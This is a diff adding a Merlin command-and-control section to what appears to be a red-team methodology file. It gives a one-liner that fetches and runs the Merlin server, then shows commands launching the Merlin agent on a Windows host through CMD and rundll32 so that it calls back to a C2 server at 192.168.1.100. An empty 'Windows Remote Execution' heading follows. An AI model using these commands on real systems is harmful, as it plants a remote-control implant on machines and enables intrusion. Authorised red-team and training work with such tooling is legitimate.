--- a/Methodology/C2.md
+++ b/Methodology/C2.md
@@ -55,4 +55,46 @@
 
 # Merlin
 
+![image](https://user-images.githubusercontent.com/83407557/173481864-e97d726a-d779-4926-8f0f-08244bded3de.png)
+
+[Online Documentation](https://merlin-c2.readthedocs.io/en/latest/index.html)
+
+[Github page](https://github.com/Ne0nd0g/merlin)
+
+## Merlin Server
+
+The following single line of code can be used to download, extract, and run Merlin Server on an Ubuntu Server:
+```bash
+sudo bash;apt update;apt install p7zip-full -y;cd /opt;wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z;7z x -pmerlin -omerlin merlinServer-Linux-x64.7z;cd merlin;./merlinServer-Linux-x64
+```
+## Merlin Agents
+
+Pre-compiled Merlin Agent binary files are distributed with the server download in the data/bin/ directory of Merlin
+
+Can also use GO to retrieve and build an Agent
+```bash
+go get github.com/Ne0nd0g/merlin-agent
+```
+
+### Upload and Execute
+
+Unless recompiling binary, the hardcoded -url flag needs to be set to your C2 server url when executing. For these examples the C2 server ip is 192.168.1.100.
+
+
+
+### Windows Local Execution
+
+#### CMD.exe
+```cmd
+C:\Users\Bob\Downloads>merlinAgent.exe -url https://192.168.1.100:443/
+```
+#### rundll32.exe
+```cmd
+C:\Users\Bob\Downloads>C:\WINDOWS\System32\rundll32.exe merlin.dll,Run https://192.168.1.100:443/
+```
+
+
+### Windows Remote Execution
+
+
 # Nishang
